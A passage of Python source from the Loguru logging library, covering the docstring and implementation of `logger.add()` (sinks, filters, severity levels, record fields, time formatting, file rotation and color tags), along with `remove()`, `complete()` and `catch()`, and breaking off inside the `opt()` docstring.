An object in charge of receiving formatted logging messages and propagating them to an
appropriate endpoint.
level : |int| or |str|, optional
The minimum severity level from which logged messages should be sent to the sink.
format : |str| or |callable|_, optional
The template used to format logged messages before being sent to the sink.
filter : |callable|_, |str| or |dict|, optional
A directive optionally used to decide for each logged message whether it should be sent
to the sink or not.
colorize : |bool|, optional
Whether the color markups contained in the formatted message should be converted to ansi
codes for terminal coloration, or stripped otherwise. If ``None``, the choice is
automatically made based on the sink being a tty or not.
serialize : |bool|, optional
Whether the logged message and its records should be first converted to a JSON string
before being sent to the sink.
backtrace : |bool|, optional
Whether the formatted exception trace should be extended upward, beyond the catching
point, to show the full stacktrace which generated the error.
diagnose : |bool|, optional
Whether the exception trace should display the variables' values to ease debugging.
This should be set to ``False`` in production to avoid leaking sensitive data.
enqueue : |bool|, optional
Whether the messages to be logged should first pass through a multiprocess-safe queue
before reaching the sink. This is useful while logging to a file through multiple
processes. This also has the advantage of making logging calls non-blocking.
catch : |bool|, optional
Whether errors occurring while the sink handles log messages should be automatically
caught. If ``True``, an exception message is displayed on |sys.stderr| but the exception
is not propagated to the caller, preventing your app from crashing.
**kwargs
Additional parameters that are only valid to configure a coroutine or file sink (see
below).
If and only if the sink is a coroutine function, the following parameter applies:
Parameters
----------
loop : |AbstractEventLoop|, optional
The event loop in which the asynchronous logging task will be scheduled and executed. If
``None``, the loop returned by |asyncio.get_event_loop| is used.
If and only if the sink is a file path, the following parameters apply:
Parameters
----------
rotation : |str|, |int|, |time|, |timedelta| or |callable|_, optional
A condition indicating whenever the current logged file should be closed and a new one
started.
retention : |str|, |int|, |timedelta| or |callable|_, optional
A directive filtering old files that should be removed during rotation or end of
program.
compression : |str| or |callable|_, optional
A compression or archive format to which log files should be converted at closure.
delay : |bool|, optional
Whether the file should be created as soon as the sink is configured, or delayed until
first logged message. It defaults to ``False``.
mode : |str|, optional
The opening mode as for built-in |open| function. It defaults to ``"a"`` (open the
file in appending mode).
buffering : |int|, optional
The buffering policy as for built-in |open| function. It defaults to ``1`` (line
buffered file).
encoding : |str|, optional
The file encoding as for built-in |open| function. If ``None``, it defaults to
|locale.getpreferredencoding|.
**kwargs
Other parameters are passed to the built-in |open| function.
Returns
-------
:class:`int`
An identifier associated with the added sink and which should be used to
|remove| it.
Notes
-----
Extended summary follows.
.. _sink:
.. rubric:: The sink parameter
The ``sink`` handles incoming log messages and proceeds to write them somewhere and
somehow. A sink can take many forms:
- A |file-like object|_ like ``sys.stderr`` or ``open("somefile.log", "w")``. Anything with
a ``.write()`` method is considered a file-like object. Custom handlers may also
implement ``flush()`` (called after each logged message), ``stop()`` (called at sink
termination) and ``complete()`` (awaited by the eponymous method).
- A file path as |str| or |Path|. It can be parametrized with some additional parameters,
see below.
- A |callable|_ (such as a simple function) like ``lambda msg: print(msg)``. This
allows the logging procedure to be entirely defined by user preferences and needs.
- An asynchronous |coroutine function|_ defined with the ``async def`` statement. The
coroutine object returned by such a function will be added to the event loop using
|loop.create_task|. The tasks should be awaited before ending the loop by using
|complete|.
- A built-in |Handler| like ``logging.StreamHandler``. In such a case, the `Loguru` records
are automatically converted to the structure expected by the |logging| module.
Note that you should avoid using the ``logger`` inside any of your sinks as this would
result in infinite recursion or a deadlock if the module's sink was not explicitly disabled.
.. _message:
.. rubric:: The logged message
The logged message passed to all added sinks is nothing more than a string of the
formatted log, to which a special attribute is associated: the ``.record`` which is a dict
containing all contextual information possibly needed (see below).
Logged messages are formatted according to the ``format`` of the added sink. This format
is usually a string containing braces fields to display attributes from the record dict.
If fine-grained control is needed, the ``format`` can also be a function which takes the
record as parameter and returns the format template string. However, note that in such a
case, you should take care of appending the line ending and exception field to the returned
format, whereas ``"\n{exception}"`` is automatically appended for convenience if ``format`` is
a string.
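For instance, a dynamic formatter could be sketched as follows (the ``formatter`` function
is purely illustrative, it is not part of `Loguru`):
>>> def formatter(record):
...     if record["exception"] is not None:
...         return "{time} | {level} | {message}\n{exception}"
...     return "{time} | {level} | {message}\n"
...
>>> logger.add(sys.stderr, format=formatter)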
The ``filter`` attribute can be used to control which messages are effectively passed to the
sink and which ones are ignored. A function can be used, accepting the record as an
argument, and returning ``True`` if the message should be logged, ``False`` otherwise. If
a string is used, only the records with the same ``name`` and its children will be allowed.
One can also pass a ``dict`` mapping module names to the minimum required level. In such a
case, each log record will search for its closest parent in the ``dict`` and use the associated
level as the filter. The ``dict`` values can be ``int`` severity, ``str`` level name or
``True`` and ``False`` to respectively authorize and discard all module logs
unconditionally. In order to set a default level, the ``""`` module name should be used as
it is the parent of all modules (it does not suppress global ``level`` threshold, though).
Note that while calling a logging method, the keyword arguments (if any) are automatically
added to the ``extra`` dict for convenient contextualization (in addition to being used for
formatting).
.. _levels:
.. rubric:: The severity levels
Each logged message is associated with a severity level. These levels make it possible to
prioritize messages and to choose the verbosity of the logs according to usage. For
example, it makes it possible to display some debugging information to a developer while
hiding it from the end user running the application.
The ``level`` attribute of every added sink controls the minimum threshold from which log
messages are allowed to be emitted. While using the ``logger``, you are in charge of
configuring the appropriate granularity of your logs. It is possible to add even more custom
levels by using the |level| method.
Here are the standard levels with their default severity value, each one is associated with
a logging method of the same name:
+----------------------+------------------------+------------------------+
| Level name | Severity value | Logger method |
+======================+========================+========================+
| ``TRACE`` | 5 | |logger.trace| |
+----------------------+------------------------+------------------------+
| ``DEBUG`` | 10 | |logger.debug| |
+----------------------+------------------------+------------------------+
| ``INFO`` | 20 | |logger.info| |
+----------------------+------------------------+------------------------+
| ``SUCCESS`` | 25 | |logger.success| |
+----------------------+------------------------+------------------------+
| ``WARNING`` | 30 | |logger.warning| |
+----------------------+------------------------+------------------------+
| ``ERROR`` | 40 | |logger.error| |
+----------------------+------------------------+------------------------+
| ``CRITICAL`` | 50 | |logger.critical| |
+----------------------+------------------------+------------------------+
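For instance, a sink restricted to warnings and more severe messages could be added as
follows (a minimal sketch):
>>> logger.add(sys.stderr, level="WARNING")  # "TRACE" to "SUCCESS" messages are discarded by this sink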
.. _record:
.. rubric:: The record dict
The record is just a Python dict, accessible from sinks by ``message.record``. It contains
all contextual information of the logging call (time, function, file, line, level, etc.).
Each of its keys can be used in the handler's ``format`` so the corresponding value is
properly displayed in the logged message (e.g. ``"{level}"`` -> ``"INFO"``). Some record
values are objects with two or more attributes; these can be formatted with ``"{key.attr}"``
(``"{key}"`` would display one of them by default). `Formatting directives`_ like ``"{key: >3}"``
also work and are particularly useful for time (see below).
+------------+---------------------------------+----------------------------+
| Key | Description | Attributes |
+============+=================================+============================+
| elapsed | The time elapsed since the | See |timedelta| |
| | start of the program | |
+------------+---------------------------------+----------------------------+
| exception | The formatted exception if any, | ``type``, ``value``, |
| | ``None`` otherwise | ``traceback`` |
+------------+---------------------------------+----------------------------+
| extra | The dict of attributes | None |
| | bound by the user (see |bind|) | |
+------------+---------------------------------+----------------------------+
| file | The file where the logging call | ``name`` (default), |
| | was made | ``path`` |
+------------+---------------------------------+----------------------------+
| function | The function from which the | None |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
| level | The severity used to log the | ``name`` (default), |
| | message | ``no``, ``icon`` |
+------------+---------------------------------+----------------------------+
| line | The line number in the source | None |
| | code | |
+------------+---------------------------------+----------------------------+
| message | The logged message (not yet | None |
| | formatted) | |
+------------+---------------------------------+----------------------------+
| module | The module where the logging | None |
| | call was made | |
+------------+---------------------------------+----------------------------+
| name | The ``__name__`` where the | None |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
| process | The process in which the | ``name``, ``id`` (default) |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
| thread | The thread in which the | ``name``, ``id`` (default) |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
| time | The aware local time when the | See |datetime| |
| | logging call was made | |
+------------+---------------------------------+----------------------------+
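As a short illustration (a sketch only), several record keys and attributes can be combined
in a handler format:
>>> fmt = "{time:HH:mm:ss} | {level.icon} {level.name} | {file.name}:{line} - {message}"
>>> logger.add(sys.stderr, format=fmt)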
.. _time:
.. rubric:: The time formatting
To use your favorite time representation, you can set it directly in the time formatter
specifier of your handler format, like for example ``format="{time:HH:mm:ss} {message}"``.
Note that this datetime represents your local time, and it is also made timezone-aware,
so you can display the UTC offset to avoid ambiguities.
The time field can be formatted using more human-friendly tokens. These constitute a subset
of those used by the `Pendulum`_ library of `@sdispater`_. To escape a token, just add
square brackets around it, for example ``"[YY]"`` would display literally ``"YY"``.
If you prefer to display UTC rather than local time, you can add ``"!UTC"`` at the very end
of the time format, like ``{time:HH:mm:ss!UTC}``. Doing so will convert the ``datetime``
to UTC before formatting.
If no time formatter specifier is used, like for example if ``format="{time} {message}"``,
the default one will use ISO 8601.
+------------------------+---------+----------------------------------------+
| | Token | Output |
+========================+=========+========================================+
| Year | YYYY | 2000, 2001, 2002 ... 2012, 2013 |
| +---------+----------------------------------------+
| | YY | 00, 01, 02 ... 12, 13 |
+------------------------+---------+----------------------------------------+
| Quarter | Q | 1 2 3 4 |
+------------------------+---------+----------------------------------------+
| Month | MMMM | January, February, March ... |
| +---------+----------------------------------------+
| | MMM | Jan, Feb, Mar ... |
| +---------+----------------------------------------+
| | MM | 01, 02, 03 ... 11, 12 |
| +---------+----------------------------------------+
| | M | 1, 2, 3 ... 11, 12 |
+------------------------+---------+----------------------------------------+
| Day of Year | DDDD | 001, 002, 003 ... 364, 365 |
| +---------+----------------------------------------+
| | DDD | 1, 2, 3 ... 364, 365 |
+------------------------+---------+----------------------------------------+
| Day of Month | DD | 01, 02, 03 ... 30, 31 |
| +---------+----------------------------------------+
| | D | 1, 2, 3 ... 30, 31 |
+------------------------+---------+----------------------------------------+
| Day of Week | dddd | Monday, Tuesday, Wednesday ... |
| +---------+----------------------------------------+
| | ddd | Mon, Tue, Wed ... |
| +---------+----------------------------------------+
| | d | 0, 1, 2 ... 6 |
+------------------------+---------+----------------------------------------+
| Days of ISO Week | E | 1, 2, 3 ... 7 |
+------------------------+---------+----------------------------------------+
| Hour                   | HH      | 00, 01, 02 ... 22, 23                  |
| +---------+----------------------------------------+
|                        | H       | 0, 1, 2 ... 22, 23                     |
| +---------+----------------------------------------+
| | hh | 01, 02, 03 ... 11, 12 |
| +---------+----------------------------------------+
| | h | 1, 2, 3 ... 11, 12 |
+------------------------+---------+----------------------------------------+
| Minute | mm | 00, 01, 02 ... 58, 59 |
| +---------+----------------------------------------+
| | m | 0, 1, 2 ... 58, 59 |
+------------------------+---------+----------------------------------------+
| Second | ss | 00, 01, 02 ... 58, 59 |
| +---------+----------------------------------------+
| | s | 0, 1, 2 ... 58, 59 |
+------------------------+---------+----------------------------------------+
| Fractional Second | S | 0 1 ... 8 9 |
| +---------+----------------------------------------+
| | SS | 00, 01, 02 ... 98, 99 |
| +---------+----------------------------------------+
| | SSS | 000 001 ... 998 999 |
| +---------+----------------------------------------+
| | SSSS... | 000[0..] 001[0..] ... 998[0..] 999[0..]|
| +---------+----------------------------------------+
| | SSSSSS | 000000 000001 ... 999998 999999 |
+------------------------+---------+----------------------------------------+
| AM / PM | A | AM, PM |
+------------------------+---------+----------------------------------------+
| Timezone | Z | -07:00, -06:00 ... +06:00, +07:00 |
| +---------+----------------------------------------+
| | ZZ | -0700, -0600 ... +0600, +0700 |
| +---------+----------------------------------------+
| | zz | EST CST ... MST PST |
+------------------------+---------+----------------------------------------+
| Seconds timestamp | X | 1381685817, 1234567890.123 |
+------------------------+---------+----------------------------------------+
| Microseconds timestamp | x | 1234567890123 |
+------------------------+---------+----------------------------------------+
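For example (a minimal sketch), tokens can be freely combined with literal text and suffixed
with ``"!UTC"``:
>>> logger.add(sys.stderr, format="{time:YYYY-MM-DD at HH:mm:ss!UTC} | {message}")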
.. _file:
.. rubric:: The file sinks
If the sink is a |str| or a |Path|, the corresponding file will be opened for writing logs.
The path can also contain a special ``"{time}"`` field that will be formatted with the
current date at file creation.
The ``rotation`` check is made before logging each message. If there is already an existing
file with the same name as the file to be created, then the existing file is renamed by
appending the date to its basename to prevent file overwriting. This parameter accepts:
- an |int| which corresponds to the maximum file size in bytes before the current
logged file is closed and a new one is started.
- a |timedelta| which indicates the frequency of each new rotation.
- a |time| which specifies the hour when the daily rotation should occur.
- a |str| for human-friendly parametrization of one of the previously enumerated types.
Examples: ``"100 MB"``, ``"0.5 GB"``, ``"1 month 2 weeks"``, ``"4 days"``, ``"10h"``,
``"monthly"``, ``"18:00"``, ``"sunday"``, ``"w0"``, ``"monday at 12:00"``, ...
- a |callable|_ which will be invoked before logging. It should accept two arguments: the
logged message and the file object, and it should return ``True`` if the rotation should
happen now, ``False`` otherwise.
The ``retention`` occurs at rotation or at sink stop if rotation is ``None``. Files are
selected if they match the pattern ``"basename(.*).ext(.*)"`` (possible time fields are
beforehand replaced with ``.*``) based on the sink file. This parameter accepts:
- an |int| which indicates the number of log files to keep, while older files are removed.
- a |timedelta| which specifies the maximum age of files to keep.
- a |str| for human-friendly parametrization of the maximum age of files to keep.
Examples: ``"1 week, 3 days"``, ``"2 months"``, ...
- a |callable|_ which will be invoked before the retention process. It should accept the
list of log files as argument and proceed to whatever it wants (moving files, removing
them, etc.).
The ``compression`` happens at rotation or at sink stop if rotation is ``None``. This
parameter accepts:
- a |str| which corresponds to the compressed or archived file extension. This can be one
of: ``"gz"``, ``"bz2"``, ``"xz"``, ``"lzma"``, ``"tar"``, ``"tar.gz"``, ``"tar.bz2"``,
``"tar.xz"``, ``"zip"``.
- a |callable|_ which will be invoked before file termination. It should accept the path of
the log file as argument and proceed to whatever it wants (custom compression, network
sending, removing it, etc.).
Either way, if you use a custom function designed according to your preferences, you must be
very careful not to use the ``logger`` within your function. Otherwise, there is a risk that
your program hangs because of a deadlock.
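For example, a rotating file sink combining these parameters could be sketched as follows
(the ``"logs/app_{time}.log"`` path and the ``should_rotate`` function are hypothetical):
>>> logger.add("logs/app_{time}.log", rotation="10 MB", retention="10 days", compression="zip")
>>> def should_rotate(message, file):  # hypothetical callable rotation
...     return file.tell() + len(message) > 10 * 1024 * 1024  # rotate at roughly 10 MB
...
>>> logger.add("logs/custom.log", rotation=should_rotate)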
.. _color:
.. rubric:: The color markups
To add colors to your logs, you just have to enclose your format string with the appropriate
tags (e.g. ``<red>some message</red>``). These tags are automatically removed if the sink
doesn't support ansi codes. For convenience, you can use ``</>`` to close the last opening
tag without repeating its name (e.g. ``<red>another message</>``).
The special tag ``<level>`` (abbreviated with ``<lvl>``) is transformed according to
the configured color of the logged message level.
Tags which are not recognized will raise an exception during parsing, to inform you about
possible misuse. If you wish to display a markup tag literally, you can escape it by
prepending a ``\`` like for example ``\<blue>``. If, for some reason, you need to escape a
string programmatically, note that the regex used internally to parse markup tags is
``r"\\?</?((?:[fb]g\s)?[^<>\s]*)>"``.
Note that when logging a message with ``opt(colors=True)``, color tags present in the
formatting arguments (``args`` and ``kwargs``) are completely ignored. This is important if
you need to log strings containing markups that might interfere with the color tags (in this
case, do not use f-string).
Here are the available tags (note that compatibility may vary depending on terminal):
+------------------------------------+--------------------------------------+
| Color (abbr) | Styles (abbr) |
+====================================+======================================+
| Black (k) | Bold (b) |
+------------------------------------+--------------------------------------+
| Blue (e) | Dim (d) |
+------------------------------------+--------------------------------------+
| Cyan (c) | Normal (n) |
+------------------------------------+--------------------------------------+
| Green (g) | Italic (i) |
+------------------------------------+--------------------------------------+
| Magenta (m) | Underline (u) |
+------------------------------------+--------------------------------------+
| Red (r) | Strike (s) |
+------------------------------------+--------------------------------------+
| White (w) | Reverse (v) |
+------------------------------------+--------------------------------------+
| Yellow (y) | Blink (l) |
+------------------------------------+--------------------------------------+
| | Hide (h) |
+------------------------------------+--------------------------------------+
Usage:
+-----------------+-------------------------------------------------------------------+
| Description | Examples |
| +---------------------------------+---------------------------------+
| | Foreground | Background |
+=================+=================================+=================================+
| Basic colors | ``<red>``, ``<r>`` | ``<GREEN>``, ``<G>`` |
+-----------------+---------------------------------+---------------------------------+
| Light colors | ``<light-blue>``, ``<le>`` | ``<LIGHT-CYAN>``, ``<LC>`` |
+-----------------+---------------------------------+---------------------------------+
| 8-bit colors | ``<fg 86>``, ``<fg 255>`` | ``<bg 42>``, ``<bg 9>`` |
+-----------------+---------------------------------+---------------------------------+
| Hex colors | ``<fg #00005f>``, ``<fg #EE1>`` | ``<bg #AF5FD7>``, ``<bg #fff>`` |
+-----------------+---------------------------------+---------------------------------+
| RGB colors | ``<fg 0,95,0>`` | ``<bg 72,119,65>`` |
+-----------------+---------------------------------+---------------------------------+
| Stylizing | ``<bold>``, ``<b>``, ``<underline>``, ``<u>`` |
+-----------------+-------------------------------------------------------------------+
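For instance (a minimal sketch):
>>> logger.add(sys.stderr, colorize=True, format="<green>{time}</green> | <level>{message}</level>")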
.. _env:
.. rubric:: The environment variables
The default values of sink parameters can be entirely customized. This is particularly
useful if you don't like the log format of the pre-configured sink.
Each of the |add| default parameters can be modified by setting the ``LOGURU_[PARAM]``
environment variable. For example on Linux: ``export LOGURU_FORMAT="{time} - {message}"``
or ``export LOGURU_DIAGNOSE=NO``.
The default levels' attributes can also be modified by setting the ``LOGURU_[LEVEL]_[ATTR]``
environment variable. For example, on Windows: ``setx LOGURU_DEBUG_COLOR "<blue>"``
or ``setx LOGURU_TRACE_ICON "🚀"``. If you use the ``set`` command, do not include quotes
but escape special symbols as needed, e.g. ``set LOGURU_DEBUG_COLOR=^<blue^>``.
If you want to disable the pre-configured sink, you can set the ``LOGURU_AUTOINIT``
variable to ``False``.
On Linux, you will probably need to edit the ``~/.profile`` file to make this persistent. On
Windows, don't forget to restart your terminal for the change to be taken into account.
Examples
--------
>>> logger.add(sys.stdout, format="{time} - {level} - {message}", filter="sub.module")
>>> logger.add("file_{time}.log", level="TRACE", rotation="100 MB")
>>> def debug_only(record):
... return record["level"].name == "DEBUG"
...
>>> logger.add("debug.log", filter=debug_only) # Other levels are filtered out
>>> def my_sink(message):
... record = message.record
... update_db(message, time=record["time"], level=record["level"])
...
>>> logger.add(my_sink)
>>> level_per_module = {
... "": "DEBUG",
... "third.lib": "WARNING",
... "anotherlib": False
... }
>>> logger.add(lambda m: print(m, end=""), filter=level_per_module, level=0)
>>> async def publish(message):
... await api.post(message)
...
>>> logger.add(publish, serialize=True)
>>> from logging import StreamHandler
>>> logger.add(StreamHandler(sys.stderr), format="{message}")
>>> class RandomStream:
... def __init__(self, seed, threshold):
... self.threshold = threshold
... random.seed(seed)
... def write(self, message):
... if random.random() > self.threshold:
... print(message)
...
>>> stream_object = RandomStream(seed=12345, threshold=0.25)
>>> logger.add(stream_object, level="INFO")
"""
with self._core.lock:
handler_id = next(self._core.handlers_count)
error_interceptor = ErrorInterceptor(catch, handler_id)
if colorize is None and serialize:
colorize = False
if isinstance(sink, (str, PathLike)):
path = sink
name = "'%s'" % path
if colorize is None:
colorize = False
wrapped_sink = FileSink(path, **kwargs)
kwargs = {}
encoding = wrapped_sink.encoding
terminator = "\n"
exception_prefix = ""
elif hasattr(sink, "write") and callable(sink.write):
name = getattr(sink, "name", None) or repr(sink)
if colorize is None:
colorize = _colorama.should_colorize(sink)
if colorize is True and _colorama.should_wrap(sink):
stream = _colorama.wrap(sink)
else:
stream = sink
wrapped_sink = StreamSink(stream)
encoding = getattr(sink, "encoding", None)
terminator = "\n"
exception_prefix = ""
elif isinstance(sink, logging.Handler):
name = repr(sink)
if colorize is None:
colorize = False
wrapped_sink = StandardSink(sink)
encoding = getattr(sink, "encoding", None)
terminator = ""
exception_prefix = "\n"
elif iscoroutinefunction(sink) or iscoroutinefunction(getattr(sink, "__call__", None)):
name = getattr(sink, "__name__", None) or repr(sink)
if colorize is None:
colorize = False
loop = kwargs.pop("loop", None)
# The worker thread needs an event loop, it can't create a new one internally because it
# has to be accessible by the user while calling "complete()", instead we use the global
# one when the sink is added. If "enqueue=False" the event loop is dynamically retrieved
# at each logging call, which is much more convenient. However, coroutines can't access the
# running loop in Python 3.5.2 and earlier versions, see python/asyncio#452.
if enqueue and loop is None:
loop = asyncio.get_event_loop()
coro = sink if iscoroutinefunction(sink) else sink.__call__
wrapped_sink = AsyncSink(coro, loop, error_interceptor)
encoding = "utf8"
terminator = "\n"
exception_prefix = ""
elif callable(sink):
name = getattr(sink, "__name__", None) or repr(sink)
if colorize is None:
colorize = False
wrapped_sink = CallableSink(sink)
encoding = "utf8"
terminator = "\n"
exception_prefix = ""
else:
raise TypeError("Cannot log to objects of type '%s'" % type(sink).__name__)
if kwargs:
raise TypeError("add() got an unexpected keyword argument '%s'" % next(iter(kwargs)))
if filter is None:
filter_func = None
elif filter == "":
filter_func = _filters.filter_none
elif isinstance(filter, str):
parent = filter + "."
length = len(parent)
filter_func = functools.partial(_filters.filter_by_name, parent=parent, length=length)
elif isinstance(filter, dict):
level_per_module = {}
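# Normalize every entry of the filter dict to an integer severity
# (or False to unconditionally discard logs of the associated module).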
for module, level_ in filter.items():
if module is not None and not isinstance(module, str):
raise TypeError(
"The filter dict contains an invalid module, "
"it should be a string (or None), not: '%s'" % type(module).__name__
)
if level_ is False:
levelno_ = False
elif level_ is True:
levelno_ = 0
elif isinstance(level_, str):
try:
levelno_ = self.level(level_).no
except ValueError:
raise ValueError(
"The filter dict contains a module '%s' associated to a level name "
"which does not exist: '%s'" % (module, level_)
)
elif isinstance(level_, int):
levelno_ = level_
else:
raise TypeError(
"The filter dict contains a module '%s' associated to an invalid level, "
"it should be an integer, a string or a boolean, not: '%s'"
% (module, type(level_).__name__)
)
if levelno_ < 0:
raise ValueError(
"The filter dict contains a module '%s' associated to an invalid level, "
"it should be a positive interger, not: '%d'" % (module, levelno_)
)
level_per_module[module] = levelno_
filter_func = functools.partial(
_filters.filter_by_level, level_per_module=level_per_module
)
elif callable(filter):
if filter == builtins.filter:
raise ValueError(
"The built-in 'filter()' function cannot be used as a 'filter' parameter, "
"this is most likely a mistake (please double-check the arguments passed "
"to 'logger.add()')."
)
filter_func = filter
else:
raise TypeError(
"Invalid filter, it should be a function, a string or a dict, not: '%s'"
% type(filter).__name__
)
if isinstance(level, str):
levelno = self.level(level).no
elif isinstance(level, int):
levelno = level
else:
raise TypeError(
"Invalid level, it should be an integer or a string, not: '%s'"
% type(level).__name__
)
if levelno < 0:
raise ValueError(
"Invalid level value, it should be a positive integer, not: %d" % levelno
)
if isinstance(format, str):
try:
formatter = Colorizer.prepare_format(format + terminator + "{exception}")
except ValueError as e:
raise ValueError(
"Invalid format, color markups could not be parsed correctly"
) from e
is_formatter_dynamic = False
elif callable(format):
if format == builtins.format:
raise ValueError(
"The built-in 'format()' function cannot be used as a 'format' parameter, "
"this is most likely a mistake (please double-check the arguments passed "
"to 'logger.add()')."
)
formatter = format
is_formatter_dynamic = True
else:
raise TypeError(
"Invalid format, it should be a string or a function, not: '%s'"
% type(format).__name__
)
if not isinstance(encoding, str):
encoding = "ascii"
with self._core.lock:
exception_formatter = ExceptionFormatter(
colorize=colorize,
encoding=encoding,
diagnose=diagnose,
backtrace=backtrace,
hidden_frames_filename=self.catch.__code__.co_filename,
prefix=exception_prefix,
)
handler = Handler(
name=name,
sink=wrapped_sink,
levelno=levelno,
formatter=formatter,
is_formatter_dynamic=is_formatter_dynamic,
filter_=filter_func,
colorize=colorize,
serialize=serialize,
enqueue=enqueue,
id_=handler_id,
error_interceptor=error_interceptor,
exception_formatter=exception_formatter,
levels_ansi_codes=self._core.levels_ansi_codes,
)
handlers = self._core.handlers.copy()
handlers[handler_id] = handler
self._core.min_level = min(self._core.min_level, levelno)
self._core.handlers = handlers
return handler_id
def remove(self, handler_id=None):
"""Remove a previously added handler and stop sending logs to its sink.
Parameters
----------
handler_id : |int| or ``None``
The id of the sink to remove, as it was returned by the |add| method. If ``None``, all
handlers are removed. The pre-configured handler is guaranteed to have the index ``0``.
Raises
------
ValueError
If ``handler_id`` is not ``None`` but there is no active handler with such id.
Examples
--------
>>> i = logger.add(sys.stderr, format="{message}")
>>> logger.info("Logging")
Logging
>>> logger.remove(i)
>>> logger.info("No longer logging")
"""
if not (handler_id is None or isinstance(handler_id, int)):
raise TypeError(
"Invalid handler id, it should be an integer as returned "
"by the 'add()' method (or None), not: '%s'" % type(handler_id).__name__
)
with self._core.lock:
handlers = self._core.handlers.copy()
if handler_id is not None and handler_id not in handlers:
raise ValueError("There is no existing handler with id %d" % handler_id) from None
if handler_id is None:
handler_ids = list(handlers.keys())
else:
handler_ids = [handler_id]
for handler_id in handler_ids:
handler = handlers.pop(handler_id)
# This needs to be done first in case "stop()" raises an exception
levelnos = (h.levelno for h in handlers.values())
self._core.min_level = min(levelnos, default=float("inf"))
self._core.handlers = handlers
handler.stop()
def complete(self):
"""Wait for the end of enqueued messages and asynchronous tasks scheduled by handlers.
This method proceeds in two steps: first it waits for all logging messages added to handlers
with ``enqueue=True`` to be processed, then it returns an object that can be awaited to
finalize all logging tasks added to the event loop by coroutine sinks.
It can be called from non-asynchronous code. This is especially recommended when the
``logger`` is utilized with ``multiprocessing`` to ensure messages put to the internal
queue have been properly transmitted before leaving a child process.
The returned object should be awaited before the end of a coroutine executed by
|asyncio.run| or |loop.run_until_complete| to ensure all asynchronous logging messages are
processed. The function |asyncio.get_event_loop| is called beforehand; only tasks scheduled
in the same loop as the current one will be awaited by the method.
Returns
-------
:term:`awaitable`
An awaitable object which ensures all asynchronous logging calls are completed when
awaited.
Examples
--------
>>> async def sink(message):
... await asyncio.sleep(0.1) # IO processing...
... print(message, end="")
...
>>> async def work():
... logger.info("Start")
... logger.info("End")
... await logger.complete()
...
>>> logger.add(sink)
1
>>> asyncio.run(work())
Start
End
>>> def process():
... logger.info("Message sent from the child")
... logger.complete()
...
>>> logger.add(sys.stderr, enqueue=True)
1
>>> process = multiprocessing.Process(target=process)
>>> process.start()
>>> process.join()
Message sent from the child
"""
with self._core.lock:
handlers = self._core.handlers.copy()
for handler in handlers.values():
handler.complete_queue()
class AwaitableCompleter:
def __await__(self_):
with self._core.lock:
handlers = self._core.handlers.copy()
for handler in handlers.values():
yield from handler.complete_async().__await__()
return AwaitableCompleter()
def catch(
self,
exception=Exception,
*,
level="ERROR",
reraise=False,
onerror=None,
exclude=None,
default=None,
message="An error has been caught in function '{record[function]}', "
"process '{record[process].name}' ({record[process].id}), "
"thread '{record[thread].name}' ({record[thread].id}):"
):
"""Return a decorator to automatically log possibly caught error in wrapped function.
This is useful to ensure unexpected exceptions are logged, the entire program can be
wrapped by this method. This is also very useful to decorate |Thread.run| methods while
using threads to propagate errors to the main logger thread.
Note that the visibility of variables values (which uses the great |better_exceptions|_
library from `@Qix-`_) depends on the ``diagnose`` option of each configured sink.
The returned object can also be used as a context manager.
Parameters
----------
exception : |Exception|, optional
The type of exception to intercept. If several types should be caught, a tuple of
exceptions can be used too.
level : |str| or |int|, optional
The level name or severity with which the message should be logged.
reraise : |bool|, optional
Whether the exception should be raised again and hence propagated to the caller.
onerror : |callable|_, optional
A function that will be called if an error occurs, once the message has been logged.
It should accept the exception instance as its sole argument.
exclude : |Exception|, optional
A type of exception (or a tuple of types) that will be purposely ignored and hence
propagated to the caller without being logged.
default : optional
The value to be returned by the decorated function if an error occurred without being
re-raised.
message : |str|, optional
The message that will be automatically logged if an exception occurs. Note that it will
be formatted with the ``record`` attribute.
Returns
-------
:term:`decorator` / :term:`context manager`
An object that can be used to decorate a function or as a context manager to log
exceptions possibly caught.
Examples
--------
>>> @logger.catch
... def f(x):
... 100 / x
...
>>> def g():
... f(10)
... f(0)
...
>>> g()
ERROR - An error has been caught in function 'g', process 'Main' (367), thread 'ch1' (1398):
Traceback (most recent call last):
File "program.py", line 12, in <module>
g()
└ <function g at 0x7f225fe2bc80>
> File "program.py", line 10, in g
f(0)
└ <function f at 0x7f225fe2b9d8>
File "program.py", line 6, in f
100 / x
└ 0
ZeroDivisionError: division by zero
>>> with logger.catch(message="Because we never know..."):
... main() # No exception, no logs
>>> # Use 'onerror' to prevent the program exit code to be 0 (if 'reraise=False') while
>>> # also avoiding the stacktrace to be duplicated on stderr (if 'reraise=True').
>>> @logger.catch(onerror=lambda _: sys.exit(1))
... def main():
... 1 / 0
"""
if callable(exception) and (
not isclass(exception) or not issubclass(exception, BaseException)
):
return self.catch()(exception)
class Catcher:
def __init__(self_, from_decorator):
self_._from_decorator = from_decorator
def __enter__(self_):
return None
def __exit__(self_, type_, value, traceback_):
if type_ is None:
return
if not issubclass(type_, exception):
return False
if exclude is not None and issubclass(type_, exclude):
return False
from_decorator = self_._from_decorator
_, depth, _, *options = self._options
if from_decorator:
depth += 1
catch_options = [(type_, value, traceback_), depth, True] + options
level_id, static_level_no = self._dynamic_level(level)
self._log(level_id, static_level_no, from_decorator, catch_options, message, (), {})
if onerror is not None:
onerror(value)
return not reraise
def __call__(_, function):
catcher = Catcher(True)
if iscoroutinefunction(function):
async def catch_wrapper(*args, **kwargs):
with catcher:
return await function(*args, **kwargs)
return default
elif isgeneratorfunction(function):
def catch_wrapper(*args, **kwargs):
with catcher:
return (yield from function(*args, **kwargs))
return default
else:
def catch_wrapper(*args, **kwargs):
with catcher:
return function(*args, **kwargs)
return default
functools.update_wrapper(catch_wrapper, function)
return catch_wrapper
return Catcher(False)
def opt(
self,
*,
exception=None,
record=False,
lazy=False,
colors=False,
raw=False,
capture=True,
depth=0,
ansi=False
):
r"""Parametrize a logging call to slightly change generated log message.
Note that it's not possible to chain |opt| calls, the last one takes precedence over the
others as it will "reset" the options to their default values.
Parameters
----------
exception : |bool|, |tuple| or |Exception|, optional
If it does not evaluate as ``False``, the passed exception is formatted and added to the
log message. It could be an |Exception| object or a ``(type, value, traceback)`` tuple,
otherwise the exception information is retrieved from |sys.exc_info|.
record : |bool|, optional
If ``True``, the record dict contextualizing the logging call can be used to format the
message by using ``{record[key]}`` in the log message.
lazy : |bool|, optional
If ``True``, the arguments used to format the message should be functions which
